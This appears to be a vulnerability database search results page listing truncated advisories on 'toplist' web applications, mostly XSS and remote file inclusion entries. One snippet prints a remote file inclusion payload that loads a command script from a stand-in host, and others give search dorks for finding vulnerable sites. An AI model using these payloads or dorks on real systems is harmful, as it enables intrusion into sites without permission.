47 matches found
EUVD-2006-6442
Malware in sbrugna...
EUVD-2006-3917
Malware in sbrugna...
EUVD-2006-2151
Malware in sbrugna...
EUVD-2019-10929
Malware in sbrugna...
CVE-2019-20377
TopList before 2019-09-03 allows XSS via a title...
TopList Cross-Site Scripting Vulnerability
TopList is a content aggregation website system written in Go for getting popular headlines from other websites. A cross-site scripting vulnerability exists in versions of TopList prior to 2019-09-03. The vulnerability stems from the WEB application's lack of proper validation of client-side data...
CVE-2019-20377
TopList before 2019-09-03 allows XSS via a title...
CVE-2019-20377
TopList before 2019-09-03 allows XSS via a title...
Cross site scripting
TopList before 2019-09-03 allows XSS via a title...
CVE-2019-20377
TopList before 2019-09-03 allows XSS via a title...
CVE-2019-20377
CVE-2019-20377 affects TopList (Go-based content aggregator). The connected documents indicate a Cross-Site Scripting (XSS) flaw exploitable via the page title in TopList prior to 2019-09-03. Root cause noted in CNVD-2020-14075 as lack of proper validation of client-side data, leading to injectio...
Toplist 2 SQL Injection / Backdoor Account / Shell Upload
============================================================================ | Title : toplist v 2 Backdoor account Vulnerability | | Author : indoushka | | email : [email protected] | | Tested on : windows 10 FranASSais V.Pro | | Version : v 2 | | Vendor : http://wmscripti.com | | Dork :...
collegehumor.com XSS vulnerability
Open Bug Bounty ID: OBB-183978 Description| Value ---|--- Affected Website:| collegehumor.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
TopList <= 1.3.8 (phpBB Hack) Remote File Inclusion Vulnerability
No description provided by source. Title: TopList Hack for PHPBB = 1.3.8 Remote File Inclusion URL: http://www.phpbb2hacks.de/toplist-df148.html Dork: inurl:toplist.php powered by phpbb Credits: Oo Exploit: /toplist.php?f=toplisttop10&phpbbrootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...
Aardvark Topsites <= 4.2.2 Remote File Inclusion Vulnerability
The remote system contains a PHP application that is prone to remote file inclusions attacks. Description : Aardvark Topsites PHP is installed on the remote host. It is an open source Toplist management system written in PHP. The application does not sanitize user-supplied input to the...
CVE-2006-6459
Cross-site scripting XSS vulnerability in toplist.php in PhpBB Toplist 1.3.7 allows remote attackers to inject arbitrary HTML or web script via the 1 Name and 2 Information fields when adding a new site toplistnew action...
CVE-2006-6459
Cross-site scripting XSS vulnerability in toplist.php in PhpBB Toplist 1.3.7 allows remote attackers to inject arbitrary HTML or web script via the 1 Name and 2 Information fields when adding a new site toplistnew action...
CVE-2006-6459
CVE-2006-6459 describes a cross-site scripting (XSS) vulnerability in PhpBB Toplist 1.3.7. The flaw resides in toplist.php, allowing remote attackers to inject arbitrary HTML or web script via the (1) Name and (2) Information fields when adding a new site (action: toplistnew). The CVSS metrics in...
toplist-xss.txt
LiderHack.Org script name : PhpBB Toplist 1.3.7 Dork : toplist.php?f=toplistnew Risk : High Found By : St@rExT Vulnerable file : Toplist.php New add sites addres: toplist.php?f=toplistnew Name: xss code & Information: xss code & Name: Your name & Name: alert"yourmessage" example sites :...
PHPBB Toplist多个HTML注入漏洞
PHPBB是一款基于PHP的论坛程序。 PHPBB不充分过滤用户提交的URI输入,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。 问题是PHPBB的Toplist对用户提交的WEB参数缺少过滤,提交恶意脚本代码作为参数数据,可导致在目标用户浏览器上执行,泄露敏感信息。 phpBB Toplist 1.3.7 http://www.phpbb.com/...